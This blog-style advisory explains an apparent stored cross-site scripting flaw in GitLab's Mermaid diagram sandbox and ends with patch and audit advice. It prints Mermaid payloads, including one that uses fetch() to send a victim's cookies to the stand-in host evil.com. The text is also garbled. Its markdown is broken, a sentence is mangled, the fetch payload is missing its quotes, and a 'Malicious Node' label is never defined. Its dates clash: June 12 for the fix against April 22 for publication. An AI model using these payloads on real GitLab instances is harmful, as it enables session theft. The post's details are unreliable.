---
Intro
On June 12, 2026, GitLab published a critical fix for a vulnerability, now tracked as CVE-2026-3254, which affects all GitLab Community and Enterprise Edition (CE/EE) versions from 18.11 up to but not including 18.11.1. This bug made it possible for users (if authenticated) to inject unauthorized content into another user's browser—due to faulty input validation in the popular Mermaid diagram sandbox.
This post breaks down what really happened, shows how the exploit could work, and outlines easy steps to stay secure.
What is Mermaid?
Mermaid is a JS-based tool that lets you draw diagrams and charts with plain-text code. GitLab lets users add Mermaid diagrams to issues, merge requests, wikis, etc., making documentation much easier.
Unfortunately, the sandbox that is supposed to "contain" Mermaid diagrams wasn't strict enough.
What’s CVE-2026-3254 About?
Bad input handling in GitLab's Mermaid sandbox could allow an authenticated user (someone already logged into GitLab, even if they weren’t an admin) to inject unauthorized scripts or content. When another user viewed the crafted Mermaid diagram, the malicious content could load in their browser—possibly stealing session cookies, tokens, or more, depending on the creativity of the attacker.
Critical Factor: The attacker has to be authenticated—this is not a public/guest exploit, but anyone with a GitLab account on the affected instance could be dangerous.
How the Vulnerability Can Be Abused
GitLab tries to render Mermaid diagrams in a sandboxed <iframe> environment, but it didn’t sanitize Mermaid markup enough. By abusing the open-ended parsing features of Mermaid, an attacker could slip through HTML or JavaScript code—or a link that loads another malicious site.
Imagine an attacker submits the following in a GitLab comment, issue, or wiki
markdown<br>mermaid
graph TD;
click B "javascript:alert(document.cookie)"
<br>
If someone views the above, clicking "Malicious Node" would trigger a JavaScript alert showing the user's cookies. It could be more serious—like sending cookies to an attacker’s server.
Let’s go further
`mermaid
graph TD;
X["<img src=x onerror='fetch(https://evil.com/steal?cookie=+document.cookie)'>"] --> Y
<br><br>Once this mermaid diagram is rendered, the
tag triggers—sending your cookie to evil.com`.
Why Does This Work?
Mermaid is designed to be flexible, but GitLab failed to clean escaped HTML tags or JavaScript from Mermaid user inputs. The diagram sandbox wasn’t strict enough, letting these "creative" payloads through.
Have another user with access view the issue. The alert box will pop on their browser.
NOTE: Do not do this on production systems. Only test where you have permission!
Official Release Notes:
GitLab 18.11.1 Security Release
Mermaid Docs:
https://mermaid-js.github.io/mermaid/#/
Security Advisory:
GitLab HackerOne (advisory should appear here if public)
Admins
- Patch Immediately: Upgrade to GitLab CE/EE 18.11.1 or later.
Upgrade Instructions
- Audit Mermaid Usage: Review places (wikis/issues/MRs) with heavy Mermaid usage for suspicious content.
- Restrict Internal Accounts: If your instance must stay unpatched temporarily, restrict who can create and comment with Mermaid blocks.
Users
- Don’t Click Suspicious Diagrams: If a diagram looks weird or a node seems "interactive", be cautious.
- Report Suspicious Content: Alert your admin if you see strange pop-ups or content where it doesn’t belong.
Final Thoughts
CVE-2026-3254 is a reminder that even trusted integrations like Mermaid can be a way for attackers to slip in nasty code—if web apps don't strictly validate input. GitLab’s quick patching is a good thing, but you should still update fast, especially on instances open to lots of authenticated users.
Stay alert—and when in doubt, update your software and check those changelogs.
Timeline
Published on: 04/22/2026 16:29:48 UTC
Last modified on: 04/23/2026 20:43:26 UTC